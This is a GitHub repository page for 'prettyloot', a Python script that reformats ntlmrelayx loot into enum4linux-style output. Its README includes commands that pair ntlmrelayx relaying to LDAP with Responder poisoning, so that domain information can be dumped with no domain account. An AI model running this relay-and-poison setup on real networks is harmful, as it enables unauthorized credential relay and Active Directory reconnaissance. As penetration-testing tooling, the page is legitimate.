Skip to content
Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
Branch: master
Clone or download
Cannot retrieve the latest commit at this time.
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE
README.md Update README.md Jan 24, 2020
ntlmrelayx-prettyloot.py Remove ip Jan 24, 2020

README.md

prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output after you dump the domain info using LDAP !

image

Usage

python3 ntlmrelayx-prettyloot.py /tmp/loot

Dumping domain info using ntlmrelayx without a domain account

# screen 1 => ntlmrelayx.py -t ldap://172.16.60.205 --no-da --no-acl -l /tmp/loot
# screen 2 => responder -I eth0

image

Credits to @ditrizna

You can’t perform that action at this time.